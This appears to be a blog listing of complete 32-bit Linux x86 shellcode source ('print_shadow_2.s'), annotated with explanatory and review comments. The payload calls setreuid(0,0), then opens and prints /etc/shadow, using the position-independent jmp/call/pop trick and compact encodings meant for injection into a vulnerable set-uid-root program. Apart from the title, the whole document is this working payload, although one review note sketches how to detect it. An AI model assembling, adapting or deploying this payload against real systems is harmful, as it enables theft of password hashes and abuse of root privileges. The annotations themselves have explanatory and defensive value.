NENote of Exploiting


[SC] print_shadow_2.s : 2006-11-23


.globl main

# print_shadow_2: position-independent 32-bit x86 payload, AT&T (GAS) syntax.
#
# Every request goes through `int $0x80` with the syscall number in %eax and
# the arguments in %ebx, %ecx, %edx.  The numbers used here (0x46, 5, 3, 4,
# 6, 1) are setreuid, open, read, write, close and exit in the Linux i386
# syscall table.
#
# Observable sequence:
#   setreuid(0, 0)
#   fd = open("/etc/shadow", 0)
#   repeat: read(fd, buf, 1); stop on 0; write(1, buf, 1)
#   close(fd); exit(0)
#
# No return value is checked for failure.  Each `movb $N, %al` replaces only
# the low byte of %eax, so a correct syscall number depends on the previous
# call having returned a value whose upper 24 bits are zero.
#
# NOTE(review): setreuid(0, 0) can only succeed in a process that already has
# uid 0 among its real, effective or saved ids (for example a set-uid-root
# program); a process that has permanently dropped all three makes it fail.
# NOTE(review): for detection, the trace is a setreuid(0, 0) directly followed
# by a read-only open of /etc/shadow and one-byte read/write pairs to fd 1;
# an audit watch on reads of /etc/shadow would surface it - confirm against
# the local audit policy.
main:
    # Frame setup.  There is no matching epilogue: the code leaves via exit.
    pushl   %ebp
    movl    %esp,   %ebp

    # setreuid(0, 0).  The original label said "setuid", but 0x46 (70) is
    # setreuid on i386.  Zeroing with xorl and loading %al keeps the
    # immediate to a single byte.
    xorl   %eax,   %eax
    mov    $0x46,  %al
    xorl   %ebx,   %ebx
    xorl   %ecx,   %ecx
    int    $0x80

    # Jump forward so that the `call` at ONE can push the address of the
    # path string (jmp/call/pop address discovery).
    jmp ONE

TWO:
    # open(path, 0).  The popped return address of `call TWO` is the address
    # of the string that follows it.  %ecx is still 0 from the setreuid
    # setup (the code relies on the syscall preserving it) and serves as the
    # flags argument.
    popl   %ebx
    movb   $0x5,   %al
    # Store a zero byte at path+11, the position right after the 11
    # characters of "/etc/shadow".  `.string` already emits that terminator,
    # so in this assembled form the store rewrites a byte that is already
    # zero.  It requires the memory holding this code to be writable; a
    # non-writable code mapping (W^X) makes it fault.
    # NOTE(review): no section directive is visible, so this presumably
    # lands in .text - confirm how the listing was meant to be run.
    movb   %cl,    11(%ebx)
    int    $0x80
    # Keep the returned descriptor in %ebx; a negative (error) return is
    # used as-is.
    movl   %eax,   %ebx

loop:
    # read(fd, %esp, 1).  The one-byte buffer is the top of the stack, which
    # at this point is the %ebp slot saved by the prologue.
    xorl   %edx,   %edx
    inc    %edx
    movl   %esp,   %ecx
    xorl   %eax,   %eax
    movb   $0x3,   %al
    int    $0x80
    # Save fd in %esi because the write below needs %ebx for its own fd.
    movl   %ebx,   %esi
    # Only a return of 0 (end of file) leaves the loop; a negative return
    # falls through to the write path instead.
    test   %eax,   %eax
    jz     done

    # write(1, %esp, 1).  %ecx and %edx are unchanged from the read, and
    # %eax holds the read's return value before %al is overwritten.
    movb   $0x4,   %al
    xorl   %ebx,   %ebx
    movb   $0x1,   %bl
    int    $0x80
    # Restore the file descriptor for the next read.
    movl   %esi,   %ebx
    jmp    loop

done:
    # close(fd).  %eax is 0 here (the read result that ended the loop).
    movb   $0x6,   %al
    movl   %esi,   %ebx
    int    $0x80

    # exit(0).  Loading only %al assumes close returned 0.
    movb   $0x1,   %al
    xorl   %ebx,   %ebx
    int    $0x80

ONE:
    # `call` pushes the address of the next byte, i.e. the path string, and
    # transfers control back to TWO, which pops it.
    call    TWO
    .string "/etc/shadow"
